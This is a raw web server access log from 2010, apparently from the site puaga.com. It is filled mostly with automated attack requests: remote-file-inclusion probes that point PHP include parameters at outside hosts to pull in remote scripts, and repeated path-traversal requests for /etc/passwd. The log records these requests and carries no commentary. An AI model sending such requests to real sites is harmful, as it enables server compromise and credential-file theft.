75.125.143.154 - - [11/Feb/2010:05:30:55 -0800] "GET /logs/access_100201.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:30:55 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:31:04 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:31:11 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:31:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:31:19 -0800] "GET /logs/access_100201.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:31:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:31:23 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:31:23 -0800] "GET /logs/access_100201.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:31:31 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:31:31 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:31:31 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:31:46 -0800] "GET /delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:31:46 -0800] "GET /logs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:31:46 -0800] "GET /logs/access_100112.log//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:32:53 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:32:53 -0800] "GET /logs/access_100112.log%20%20//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:32:53 -0800] "GET /delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:33:51 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:33:51 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:33:51 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:33:58 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:33:58 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:33:58 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:34:00 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:34:00 -0800] "GET /logs/access_100203.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:34:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:34:02 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:34:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [11/Feb/2010:05:34:05 -0800] "GET /logs/access_090527.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [11/Feb/2010:05:34:05 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_090527.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:34:18 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:34:22 -0800] "GET /logs/access_100203.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:34:26 -0800] "GET /logs/access_100203.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:34:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:05:34:36 -0800] "GET /bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:05:34:36 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:05:34:36 -0800] "GET /logs//bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:34:45 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:34:45 -0800] "GET /logs/access_100112.log//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:34:45 -0800] "GET /delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:34:46 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:34:46 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:34:46 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:34:48 -0800] "GET /delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:34:48 -0800] "GET /logs/access_100112.log//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:34:48 -0800] "GET /logs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:34:53 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:34:56 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:34:56 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:34:56 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:34:56 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:05:35:05 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:05:35:06 -0800] "GET /orange_g/forum/viewtopic.php?p=26425 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
94.23.18.102 - - [11/Feb/2010:05:35:11 -0800] "GET /index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:35:11 -0800] "GET /index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.803" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:35:16 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:35:16 -0800] "GET /delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:35:16 -0800] "GET /logs/access_100112.log//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:05:35:29 -0800] "GET /logs/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:05:35:29 -0800] "GET /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:05:35:29 -0800] "GET /logs/access_100109.log%20%20/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:05:35:34 -0800] "GET /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:05:35:34 -0800] "GET /logs/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:05:35:34 -0800] "GET /logs/access_100109.log%20%20/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:35:39 -0800] "GET /index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:35:39 -0800] "GET /index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.803" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:35:42 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:35:44 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:05:35:53 -0800] "GET /logs/access_100121.log%20%20////administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:05:35:53 -0800] "GET /logs////administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:05:35:53 -0800] "GET ///administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:35:54 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:05:35:58 -0800] "GET ///administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:05:35:58 -0800] "GET /logs////administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:05:35:58 -0800] "GET /logs/access_100121.log%20%20////administrator/components/com_memberlist/current_connect.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:36:01 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:36:05 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:36:05 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:36:06 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:37:01 -0800] "GET /logs/access_100113.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:37:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:37:01 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:37:20 -0800] "GET /logs/access_100112.log%20%20//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:37:20 -0800] "GET /logs//delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:37:20 -0800] "GET /delete_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:05:37:23 -0800] "GET /logs/access_100109.log/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:05:37:43 -0800] "GET /logs/access_100109.log/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [11/Feb/2010:05:38:28 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [11/Feb/2010:05:38:28 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [11/Feb/2010:05:38:28 -0800] "GET /logs/access_100122.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:38:31 -0800] "GET /pollphp/db//booth.php?include_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:38:31 -0800] "GET /logs/access_100103.log%20%20//pollphp/db//booth.php?include_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:38:31 -0800] "GET /logs//pollphp/db//booth.php?include_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:38:32 -0800] "GET /pollphp/db//booth.php?include_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:38:32 -0800] "GET /logs//pollphp/db//booth.php?include_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:38:32 -0800] "GET /logs/access_100103.log%20%20//pollphp/db//booth.php?include_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:38:46 -0800] "GET /logs/access_100126.log%20%20//pollphp/db//booth.php?include_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:38:48 -0800] "GET /logs/access_100126.log%20%20//pollphp/db//booth.php?include_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:05:39:02 -0800] "GET /logs//bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:05:39:02 -0800] "GET /bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:05:39:02 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:05:39:54 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:05:39:54 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:05:39:54 -0800] "GET /logs/access_100119.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:05:40:01 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:05:40:01 -0800] "GET /logs/access_100119.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:05:40:01 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:40:12 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:40:12 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:40:12 -0800] "GET /logs/access_100117.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:05:40:16 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:05:40:16 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/public/displayCategory.php?basepath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:05:40:17 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:40:48 -0800] "GET /logs/access_100114.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:01 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:01 -0800] "GET /logs/access_100117.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:01 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:05 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:05 -0800] "GET /logs/access_100117.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
